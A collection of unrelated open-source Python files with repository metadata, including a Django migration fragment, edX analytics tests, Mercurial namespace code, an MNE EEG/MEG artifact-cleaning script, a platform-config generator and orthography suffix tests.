'tier_name': ('django.db.models.fields.CharField', [], {'default': "'basic'", 'max_length': '255'}),
'use_original_date': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'localtv.tierinfo': {
'Meta': {'object_name': 'TierInfo'},
'already_sent_tiers_compliance_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'already_sent_welcome_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'current_paypal_profile_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'free_trial_available': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'free_trial_started_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'free_trial_warning_sent': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'fully_confirmed_tier_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_free_trial': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'inactive_site_warning_sent': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'payment_due_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'payment_secret': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'should_send_welcome_email_on_paypal_event': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sitelocation': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['localtv.SiteLocation']", 'unique': 'True'}),
'user_has_successfully_performed_a_paypal_transaction': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'video_allotment_warning_sent': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'waiting_on_payment_until': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'localtv.video': {
'Meta': {'ordering': "['-when_submitted']", 'object_name': 'Video'},
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'authored_set'", 'blank': 'True', 'to': "orm['auth.User']"}),
'calculated_source_type': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'symmetrical': 'False', 'blank': 'True'}),
'contact': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'embed_code': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Feed']", 'null': 'True', 'blank': 'True'}),
'file_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'file_url_length': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'file_url_mimetype': ('django.db.models.fields.CharField', [], {'max_length': '60', 'blank': 'True'}),
'flash_enclosure_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_featured': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'search': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.SavedSearch']", 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'thumbnail_url': ('django.db.models.fields.URLField', [], {'max_length': '400', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video_service_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'video_service_user': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'blank': 'True'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_approved': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'when_published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'localtv.watch': {
'Meta': {'object_name': 'Watch'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Video']"})
},
'localtv.widgetsettings': {
'Meta': {'object_name': 'WidgetSettings'},
'bg_color': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}),
'bg_color_editable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'border_color': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}),
'border_color_editable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'css': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'}),
'css_editable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'icon_editable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['sites.Site']", 'unique': 'True'}),
'text_color': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}),
'text_color_editable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'title_editable': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['localtv']
|
pculture/mirocommunity
|
localtv/migrations/0069_auto__chg_field_feedimport_total_videos__chg_field_searchimport_total_.py
|
Python
|
agpl-3.0
| 25,073
|
""" Tests for analytics.distributions """
from django.test import TestCase
from nose.tools import raises
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from instructor_analytics.distributions import AVAILABLE_PROFILE_FEATURES, profile_distribution
from student.models import CourseEnrollment
from student.tests.factories import UserFactory
class TestAnalyticsDistributions(TestCase):
'''Test analytics distribution gathering.'''
def setUp(self):
super(TestAnalyticsDistributions, self).setUp()
self.course_id = SlashSeparatedCourseKey('robot', 'course', 'id')
self.users = [UserFactory(
profile__gender=['m', 'f', 'o'][i % 3],
profile__level_of_education=['a', 'hs', 'el'][i % 3],
profile__year_of_birth=i + 1930
) for i in xrange(30)]
self.ces = [CourseEnrollment.enroll(user, self.course_id)
for user in self.users]
@raises(ValueError)
def test_profile_distribution_bad_feature(self):
feature = 'robot-not-a-real-feature'
self.assertNotIn(feature, AVAILABLE_PROFILE_FEATURES)
profile_distribution(self.course_id, feature)
def test_profile_distribution_easy_choice(self):
feature = 'gender'
self.assertIn(feature, AVAILABLE_PROFILE_FEATURES)
distribution = profile_distribution(self.course_id, feature)
self.assertEqual(distribution.type, 'EASY_CHOICE')
self.assertEqual(distribution.data['no_data'], 0)
self.assertEqual(distribution.data['m'], len(self.users) / 3)
self.assertEqual(distribution.choices_display_names['m'], 'Male')
def test_profile_distribution_open_choice(self):
feature = 'year_of_birth'
self.assertIn(feature, AVAILABLE_PROFILE_FEATURES)
distribution = profile_distribution(self.course_id, feature)
print distribution
self.assertEqual(distribution.type, 'OPEN_CHOICE')
self.assertTrue(hasattr(distribution, 'choices_display_names'))
self.assertEqual(distribution.choices_display_names, None)
self.assertNotIn('no_data', distribution.data)
self.assertEqual(distribution.data[1930], 1)
def test_gender_count(self):
course_enrollments = CourseEnrollment.objects.filter(
course_id=self.course_id, user__profile__gender='m'
)
distribution = profile_distribution(self.course_id, "gender")
self.assertEqual(distribution.data['m'], len(course_enrollments))
course_enrollments[0].deactivate()
distribution = profile_distribution(self.course_id, "gender")
self.assertEqual(distribution.data['m'], len(course_enrollments) - 1)
def test_level_of_education_count(self):
course_enrollments = CourseEnrollment.objects.filter(
course_id=self.course_id, user__profile__level_of_education='hs'
)
distribution = profile_distribution(self.course_id, "level_of_education")
self.assertEqual(distribution.data['hs'], len(course_enrollments))
course_enrollments[0].deactivate()
distribution = profile_distribution(self.course_id, "level_of_education")
self.assertEqual(distribution.data['hs'], len(course_enrollments) - 1)
class TestAnalyticsDistributionsNoData(TestCase):
'''Test analytics distribution gathering.'''
def setUp(self):
super(TestAnalyticsDistributionsNoData, self).setUp()
self.course_id = SlashSeparatedCourseKey('robot', 'course', 'id')
self.users = [UserFactory(
profile__year_of_birth=i + 1930,
) for i in xrange(5)]
self.nodata_users = [UserFactory(
profile__year_of_birth=None,
profile__gender=[None, ''][i % 2]
) for i in xrange(4)]
self.users += self.nodata_users
self.ces = tuple(CourseEnrollment.enroll(user, self.course_id)
for user in self.users)
def test_profile_distribution_easy_choice_nodata(self):
feature = 'gender'
self.assertIn(feature, AVAILABLE_PROFILE_FEATURES)
distribution = profile_distribution(self.course_id, feature)
print distribution
self.assertEqual(distribution.type, 'EASY_CHOICE')
self.assertTrue(hasattr(distribution, 'choices_display_names'))
self.assertNotEqual(distribution.choices_display_names, None)
self.assertIn('no_data', distribution.data)
self.assertEqual(distribution.data['no_data'], len(self.nodata_users))
def test_profile_distribution_open_choice_nodata(self):
feature = 'year_of_birth'
self.assertIn(feature, AVAILABLE_PROFILE_FEATURES)
distribution = profile_distribution(self.course_id, feature)
print distribution
self.assertEqual(distribution.type, 'OPEN_CHOICE')
self.assertTrue(hasattr(distribution, 'choices_display_names'))
self.assertEqual(distribution.choices_display_names, None)
self.assertIn('no_data', distribution.data)
self.assertEqual(distribution.data['no_data'], len(self.nodata_users))
|
pepeportela/edx-platform
|
lms/djangoapps/instructor_analytics/tests/test_distributions.py
|
Python
|
agpl-3.0
| 5,109
|
# Portions Copyright (c) Facebook, Inc. and its affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
# Copyright 2014 Mercurial Contributors
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
from . import error, pycompat, registrar, templatekw, util
from .i18n import _
from .node import hex
namespacetable = util.sortdict()
def tolist(val):
"""
a convenience method to return an empty list instead of None
"""
if val is None:
return []
else:
return [val]
# Do not use builtinnamespace in extension code. Use `registrar.namespacetable`
# instead.
builtinnamespace = registrar.namespacepredicate(namespacetable)
@builtinnamespace("bookmarks", priority=10)
def bookmarks(repo):
bmknames = lambda repo: repo._bookmarks.keys()
bmknamemap = lambda repo, name: tolist(repo._bookmarks.get(name))
bmknodemap = lambda repo, node: repo.nodebookmarks(node)
return namespace(
templatename="bookmark",
logfmt=templatekw.getlogcolumns()["bookmark"],
listnames=bmknames,
namemap=bmknamemap,
nodemap=bmknodemap,
builtin=True,
)
@builtinnamespace("branches", priority=30)
def branches(repo):
bnames = lambda repo: repo.branchmap().keys()
bnamemap = lambda repo, name: tolist(repo.branchtip(name, True))
bnodemap = lambda repo, node: [repo[node].branch()]
return namespace(
templatename="branch",
logfmt=templatekw.getlogcolumns()["branch"],
listnames=bnames,
namemap=bnamemap,
nodemap=bnodemap,
builtin=True,
)
@builtinnamespace("remotebookmarks", priority=55)
def remotebookmarks(repo):
namemap = lambda repo, name: repo._remotenames.mark2nodes().get(name, [])
return namespace(
templatename="remotebookmarks",
logname="bookmark",
colorname="remotebookmark",
listnames=lambda repo: repo._remotenames.mark2nodes().keys(),
namemap=namemap,
nodemap=lambda repo, node: repo._remotenames.node2marks().get(node, []),
builtin=True,
)
@builtinnamespace("hoistednames", priority=60)
def hoistednames(repo):
hoist = repo.ui.config("remotenames", "hoist")
# hoisting only works if there are remote bookmarks
if hoist:
namemap = lambda repo, name: repo._remotenames.hoist2nodes(hoist).get(name, [])
return namespace(
templatename="hoistednames",
logname="hoistedname",
colorname="hoistedname",
listnames=lambda repo: repo._remotenames.hoist2nodes(hoist).keys(),
namemap=namemap,
nodemap=lambda repo, node: repo._remotenames.node2hoists(hoist).get(
node, []
),
builtin=True,
)
else:
return None
class namespaces(object):
"""provides an interface to register and operate on multiple namespaces. See
the namespace class below for details on the namespace object.
"""
_names_version = 0
def __init__(self, repo):
self._names = util.sortdict()
# Insert namespaces specified in the namespacetable, sorted
# by priority.
def sortkey(tup):
name, func = tup
return (func._priority, name)
for name, func in sorted(namespacetable.items(), key=sortkey):
ns = func(repo)
if ns is not None:
self._addnamespace(name, ns)
def __getitem__(self, namespace):
"""returns the namespace object"""
return self._names[namespace]
def __iter__(self):
return self._names.__iter__()
def items(self):
return pycompat.iteritems(self._names)
iteritems = items
def _addnamespace(self, name, namespace):
"""register a namespace
name: the name to be registered (in plural form)
namespace: namespace to be registered
"""
self._names[name] = namespace
# we only generate a template keyword if one does not already exist
if name not in templatekw.keywords:
def generatekw(**args):
return templatekw.shownames(name, **args)
templatekw.keywords[name] = generatekw
def singlenode(self, repo, name):
"""
Return the 'best' node for the given name. Best means the first node
in the first nonempty list returned by a name-to-nodes mapping function
in the defined precedence order.
Raises a KeyError if there is no such node.
"""
for ns, v in pycompat.iteritems(self._names):
# Fast path: do not consider branches unless it's "default".
if ns == "branches" and name != "default":
continue
n = v.namemap(repo, name)
if n:
# return max revision number
if len(n) > 1:
cl = repo.changelog
maxrev = max(cl.rev(node) for node in n)
return cl.node(maxrev)
return n[0]
raise KeyError(_("no such name: %s") % name)
class namespace(object):
"""provides an interface to a namespace
Namespaces are basically generic many-to-many mapping between some
(namespaced) names and nodes. The goal here is to control the pollution of
jamming things into bookmarks (in extension-land) and to simplify
internal bits of mercurial: log output, tab completion, etc.
More precisely, we define a mapping of names to nodes, and a mapping from
nodes to names. Each mapping returns a list.
Furthermore, each name mapping will be passed a name to lookup which might
not be in its domain. In this case, each method should return an empty list
and not raise an error.
This namespace object will define the properties we need:
'name': the namespace (plural form)
'templatename': name to use for templating (usually the singular form
of the plural namespace name)
'listnames': list of all names in the namespace (usually the keys of a
dictionary)
'namemap': function that takes a name and returns a list of nodes
'nodemap': function that takes a node and returns a list of names
'deprecated': set of names to be masked for ordinary use
'builtin': bool indicating if this namespace is supported by core
Mercurial.
"""
def __init__(
self,
templatename=None,
logname=None,
colorname=None,
logfmt=None,
listnames=None,
namemap=None,
nodemap=None,
deprecated=None,
builtin=False,
):
"""create a namespace
templatename: the name to use for templating
logname: the name to use for log output; if not specified templatename
is used
colorname: the name to use for colored log output; if not specified
logname is used
logfmt: the format to use for (i18n-ed) log output; if not specified
it is composed from logname
listnames: function to list all names
namemap: function that inputs a name, output node(s)
nodemap: function that inputs a node, output name(s)
deprecated: set of names to be masked for ordinary use
builtin: whether namespace is implemented by core Mercurial
"""
self.templatename = templatename
self.logname = logname
self.colorname = colorname
self.logfmt = logfmt
self.listnames = listnames
self.namemap = namemap
self.nodemap = nodemap
# if logname is not specified, use the template name as backup
if self.logname is None:
self.logname = self.templatename
# if colorname is not specified, just use the logname as a backup
if self.colorname is None:
self.colorname = self.logname
# if logfmt is not specified, compose it from logname as backup
if self.logfmt is None:
# i18n: column positioning for "hg log"
self.logfmt = ("%s:" % self.logname).ljust(13) + "%s\n"
if deprecated is None:
self.deprecated = set()
else:
self.deprecated = deprecated
self.builtin = builtin
def names(self, repo, node):
"""method that returns a (sorted) list of names in a namespace that
match a given node"""
return sorted(self.nodemap(repo, node))
def nodes(self, repo, name):
"""method that returns a list of nodes in a namespace that
match a given name.
"""
return sorted(self.namemap(repo, name))
def loadpredicate(ui, extname, registrarobj):
for name, ns in pycompat.iteritems(registrarobj._table):
if name in namespacetable:
raise error.ProgrammingError("namespace '%s' is already registered", name)
namespacetable[name] = ns
|
facebookexperimental/eden
|
eden/hg-server/edenscm/mercurial/namespaces.py
|
Python
|
gpl-2.0
| 9,152
|
#!/usr/bin/env python
"""Clean a raw file from EOG and ECG artifacts with PCA (ie SSP)
"""
from __future__ import print_function
# Authors : Dr Engr. Sheraz Khan, P.Eng, Ph.D.
# Engr. Nandita Shetty, MS.
# Alexandre Gramfort, Ph.D.
import os
import sys
import mne
def clean_ecg_eog(in_fif_fname, out_fif_fname=None, eog=True, ecg=True,
ecg_proj_fname=None, eog_proj_fname=None,
ecg_event_fname=None, eog_event_fname=None, in_path='.'):
"""Clean ECG from raw fif file
Parameters
----------
in_fif_fname : string
Raw fif File
eog_event_fname : string
name of EOG event file required.
eog : bool
Reject or not EOG artifacts.
ecg : bool
Reject or not ECG artifacts.
ecg_event_fname : string
name of ECG event file required.
in_path :
Path where all the files are.
"""
if not eog and not ecg:
raise Exception("EOG and ECG cannot be both disabled")
# Reading fif File
raw_in = mne.io.Raw(in_fif_fname)
if in_fif_fname.endswith('_raw.fif') or in_fif_fname.endswith('-raw.fif'):
prefix = in_fif_fname[:-8]
else:
prefix = in_fif_fname[:-4]
if out_fif_fname is None:
out_fif_fname = prefix + '_clean_ecg_eog_raw.fif'
if ecg_proj_fname is None:
ecg_proj_fname = prefix + '_ecg_proj.fif'
if eog_proj_fname is None:
eog_proj_fname = prefix + '_eog_proj.fif'
if ecg_event_fname is None:
ecg_event_fname = prefix + '_ecg-eve.fif'
if eog_event_fname is None:
eog_event_fname = prefix + '_eog-eve.fif'
print('Implementing ECG and EOG artifact rejection on data')
if ecg:
ecg_events, _, _ = mne.preprocessing.find_ecg_events(raw_in)
print("Writing ECG events in %s" % ecg_event_fname)
mne.write_events(ecg_event_fname, ecg_events)
print('Computing ECG projector')
command = ('mne_process_raw --cd %s --raw %s --events %s --makeproj '
'--projtmin -0.08 --projtmax 0.08 --saveprojtag _ecg_proj '
'--projnmag 2 --projngrad 1 --projevent 999 --highpass 5 '
'--lowpass 35 --projmagrej 4000 --projgradrej 3000'
% (in_path, in_fif_fname, ecg_event_fname))
st = os.system(command)
if st != 0:
print("Error while running : %s" % command)
if eog:
eog_events = mne.preprocessing.find_eog_events(raw_in)
print("Writing EOG events in %s" % eog_event_fname)
mne.write_events(eog_event_fname, eog_events)
print('Computing EOG projector')
command = ('mne_process_raw --cd %s --raw %s --events %s --makeproj '
'--projtmin -0.15 --projtmax 0.15 --saveprojtag _eog_proj '
'--projnmag 2 --projngrad 2 --projevent 998 --lowpass 35 '
'--projmagrej 4000 --projgradrej 3000' % (in_path,
in_fif_fname, eog_event_fname))
print('Running : %s' % command)
st = os.system(command)
if st != 0:
raise ValueError('Problem while running : %s' % command)
if out_fif_fname is not None:
# Applying the ECG EOG projector
print('Applying ECG EOG projector')
command = ('mne_process_raw --cd %s --raw %s '
'--proj %s --projoff --save %s --filteroff'
% (in_path, in_fif_fname, in_fif_fname, out_fif_fname))
command += ' --proj %s --proj %s' % (ecg_proj_fname, eog_proj_fname)
print('Command executed: %s' % command)
st = os.system(command)
if st != 0:
raise ValueError('Pb while running : %s' % command)
print('Done removing artifacts.')
print("Cleaned raw data saved in: %s" % out_fif_fname)
print('IMPORTANT : Please eye-ball the data !!')
else:
print('Projection not applied to raw data.')
if __name__ == '__main__':
from mne.commands.utils import get_optparser
parser = get_optparser(__file__)
parser.add_option("-i", "--in", dest="raw_in",
help="Input raw FIF file", metavar="FILE")
parser.add_option("-o", "--out", dest="raw_out",
help="Output raw FIF file", metavar="FILE",
default=None)
parser.add_option("-e", "--no-eog", dest="eog", action="store_false",
help="Remove EOG", default=True)
parser.add_option("-c", "--no-ecg", dest="ecg", action="store_false",
help="Remove ECG", default=True)
options, args = parser.parse_args()
if options.raw_in is None:
parser.print_help()
sys.exit(1)
raw_in = options.raw_in
raw_out = options.raw_out
eog = options.eog
ecg = options.ecg
clean_ecg_eog(raw_in, raw_out, eog=eog, ecg=ecg)
|
jaeilepp/eggie
|
mne/commands/mne_clean_eog_ecg.py
|
Python
|
bsd-2-clause
| 4,882
|
from numpy import sum
from numpy import zeros
from gwlfe.Memoization import memoize
from gwlfe.MultiUse_Fxns.Erosion.ErosWashoff import ErosWashoff
from gwlfe.MultiUse_Fxns.Erosion.ErosWashoff import ErosWashoff_f
def LuErosion(NYrs, DaysMonth, InitSnow_0, Temp, Prec, NRur, NUrb, Acoef, KF, LS,
C, P, Area):
result = zeros((NYrs, 10))
eros_washoff = ErosWashoff(NYrs, DaysMonth, InitSnow_0, Temp, Prec, NRur, NUrb, Acoef, KF, LS,
C, P, Area)
for Y in range(NYrs):
for i in range(12):
for l in range(NRur):
result[Y][l] += eros_washoff[Y][l][i]
return result
@memoize
def LuErosion_f(NYrs, DaysMonth, InitSnow_0, Temp, Prec, NRur, Acoef, KF, LS,
C, P, Area):
return sum(ErosWashoff_f(NYrs, DaysMonth, InitSnow_0, Temp, Prec, NRur, Acoef, KF, LS,
C, P, Area), axis=1)
|
WikiWatershed/gwlf-e
|
gwlfe/MultiUse_Fxns/Erosion/LuErosion.py
|
Python
|
apache-2.0
| 918
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
test_bifrost
----------------------------------
Tests for `bifrost` module.
"""
from bifrost.tests import base
class TestBifrost(base.TestCase):
def test_something(self):
pass
|
devananda/bifrost
|
bifrost/tests/test_bifrost.py
|
Python
|
apache-2.0
| 768
|
#!/usr/bin/env python3
# Copyright (C) 2017 Freie Universität Berlin
#
# This file is subject to the terms and conditions of the GNU Lesser
# General Public License v2.1. See the file LICENSE in the top level
# directory for more details.
import sys
from testrunner import run
def testfunc(child):
child.expect(r'OK \(\d+ tests\)', timeout=120)
if __name__ == "__main__":
sys.exit(run(testfunc))
|
x3ro/RIOT
|
tests/pkg_relic/tests/01-run.py
|
Python
|
lgpl-2.1
| 411
|
#!/usr/bin/python
############################################################
# <bsn.cl fy=2013 v=onl>
#
# Copyright 2013, 2014 Big Switch Networks, Inc.
#
# Licensed under the Eclipse Public License, Version 1.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.eclipse.org/legal/epl-v10.html
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the
# License.
#
# </bsn.cl>
############################################################
#
# Generate a new Open Network Linux platform configuration
# component.
#
############################################################
import time
import sys
import os
from compgen import ComponentGenerator
class PlatformConfigGenerator(ComponentGenerator):
def __init__(self, platform, vendor):
self.platform = platform
self.vendor = vendor
self.Vendor = vendor.title()
summary="Platform Configuration files for %s." % self.platform
ComponentGenerator.__init__(self, platform, "platform-config-" + self.platform,
"all", summary, summary)
def _required_packages(self):
p = "vendor-config-onl:all"
if self.vendor != "none":
p += " vendor-config-%s:all" % self.vendor
return p
def _makefile_dot_comp_all_rules(self):
return "\t@echo Run 'make deb'"
def _rules(self):
return """#!/usr/bin/make -f
PLATFORM_NAME=%(platform)s
BRCM_PLATFORM_NAME=none
include $(ONL)/make/platform-config-rules.mk
""" % (self.__dict__)
def __generate_file(self, path, name, contents):
if not os.path.exists(path):
os.makedirs(path)
with open("%s/%s" % (path, name), "w") as f:
f.write(contents)
def _install(self):
return "/lib/platform-config/*"
def generate(self, path):
# Generate the entire component:
ComponentGenerator.generate(self, path)
self.path = "%s/%s" % (path, self.platform)
# the platform directory layout is this
os.makedirs('%(path)s/src/install' % (self.__dict__))
os.makedirs('%(path)s/src/boot' % (self.__dict__))
os.makedirs('%(path)s/src/sbin' % (self.__dict__))
os.makedirs('%(path)s/src/python' % (self.__dict__))
self.__generate_file('%(path)s/src' % self.__dict__, 'name', self.platform+'\n')
self.__generate_file('%(path)s/src/install' % self.__dict__,
'%(platform)s.sh' % self.__dict__,
"# Platform data goes here.")
self.__generate_file('%(path)s/src/sbin' % self.__dict__,
'gpio_init',
"""# platform: %(platform)s
exit 0
""" % self.__dict__)
self.__generate_file('%(path)s/src/boot' % self.__dict__,
self.platform,
"# Platform data goes here.")
self.__generate_file('%(path)s/src/boot' % self.__dict__,
'detect.sh',
"""# Default platform detection.
if grep -q "^model.*: %(platform)s$" /proc/cpuinfo; then
echo "%(platform)s" >/etc/sl_platform
exit 0
else
exit 1
fi
""" % self.__dict__)
self.__generate_file('%(path)s/src/python' % self.__dict__,
'slpc.py',
"""#!/usr/bin/python
############################################################
#
# Platform Driver for %(platform)s
#
############################################################
import os
import struct
import time
import subprocess
from onl.platform.base import *
from onl.vendor.%(vendor)s import *
class OpenNetworkPlatformImplementation(OpenNetworkPlatform%(Vendor)s):
def model(self):
raise Exception()
def platform(self):
return '%(platform)s'
def _plat_info_dict(self):
raise Exception()
def oid_table(self):
raise Exception()
if __name__ == "__main__":
print OpenNetworkPlatformImplementation()
""" % self.__dict__)
if __name__ == '__main__':
if len(sys.argv) != 3:
print "usage: %s <platform-name> <vendor-name>" % sys.argv[0]
sys.exit(1)
pc = PlatformConfigGenerator(sys.argv[1], sys.argv[2])
pc.generate('.')
|
capveg/ONL
|
tools/py/pcgen.py
|
Python
|
epl-1.0
| 4,616
|
# Copyright (c) 2013 Hesky Fisher
# See LICENSE.txt for details.
from orthography import add_suffix
import unittest
class OrthographyTestCase(unittest.TestCase):
def test_add_suffix(self):
cases = (
('artistic', 'ly', 'artistically'),
('cosmetic', 'ly', 'cosmetically'),
('establish', 's', 'establishes'),
('speech', 's', 'speeches'),
('approach', 's', 'approaches'),
('beach', 's', 'beaches'),
('arch', 's', 'arches'),
('larch', 's', 'larches'),
('march', 's', 'marches'),
('search', 's', 'searches'),
('starch', 's', 'starches'),
('stomach', 's', 'stomachs'),
('monarch', 's', 'monarchs'),
('patriarch', 's', 'patriarchs'),
('oligarch', 's', 'oligarchs'),
('cherry', 's', 'cherries'),
('day', 's', 'days'),
('penny', 's', 'pennies'),
('pharmacy', 'ist', 'pharmacist'),
('melody', 'ist', 'melodist'),
('pacify', 'ist', 'pacifist'),
('geology', 'ist', 'geologist'),
('metallurgy', 'ist', 'metallurgist'),
('anarchy', 'ist', 'anarchist'),
('monopoly', 'ist', 'monopolist'),
('alchemy', 'ist', 'alchemist'),
('botany', 'ist', 'botanist'),
('therapy', 'ist', 'therapist'),
('theory', 'ist', 'theorist'),
('psychiatry', 'ist', 'psychiatrist'),
('lobby', 'ist', 'lobbyist'),
('hobby', 'ist', 'hobbyist'),
('copy', 'ist', 'copyist'),
('beauty', 'ful', 'beautiful'),
('weary', 'ness', 'weariness'),
('weary', 'some', 'wearisome'),
('lonely', 'ness', 'loneliness'),
('narrate', 'ing', 'narrating'),
('narrate', 'or', 'narrator'),
('generalize', 'ability', 'generalizability'),
('reproduce', 'able', 'reproducible'),
('grade', 'ations', 'gradations'),
('urine', 'ary', 'urinary'),
('achieve', 'able', 'achievable'),
('polarize', 'ation', 'polarization'),
('done', 'or', 'donor'),
('analyze', 'ed', 'analyzed'),
('narrate', 'ing', 'narrating'),
('believe', 'able', 'believable'),
('animate', 'ors', 'animators'),
('discontinue', 'ation', 'discontinuation'),
('innovate', 'ive', 'innovative'),
('future', 'ists', 'futurists'),
('illustrate', 'or', 'illustrator'),
('emerge', 'ent', 'emergent'),
('equip', 'ed', 'equipped'),
('defer', 'ed', 'deferred'),
('defer', 'er', 'deferrer'),
('defer', 'ing', 'deferring'),
('pigment', 'ed', 'pigmented'),
('refer', 'ed', 'referred'),
('fix', 'ed', 'fixed'),
('alter', 'ed', 'altered'),
('interpret', 'ing', 'interpreting'),
('wonder', 'ing', 'wondering'),
('target', 'ing', 'targeting'),
('limit', 'er', 'limiter'),
('maneuver', 'ing', 'maneuvering'),
('monitor', 'ing', 'monitoring'),
('color', 'ing', 'coloring'),
('inhibit', 'ing', 'inhibiting'),
('master', 'ed', 'mastered'),
('target', 'ing', 'targeting'),
('fix', 'ed', 'fixed'),
('scrap', 'y', 'scrappy'),
('trip', 's', 'trips'),
('equip', 's', 'equips'),
('bat', 'en', 'batten'),
('smite', 'en', 'smitten'),
('got', 'en', 'gotten'),
('bite', 'en', 'bitten'),
('write', 'en', 'written'),
('flax', 'en', 'flaxen'),
('wax', 'en', 'waxen'),
('fast', 'est', 'fastest'),
('white', 'er', 'whiter'),
('crap', 'y', 'crappy'),
('lad', 'er', 'ladder'),
)
failed = []
for word, suffix, expected in cases:
if add_suffix(word, suffix) != expected:
failed.append((word, suffix, expected))
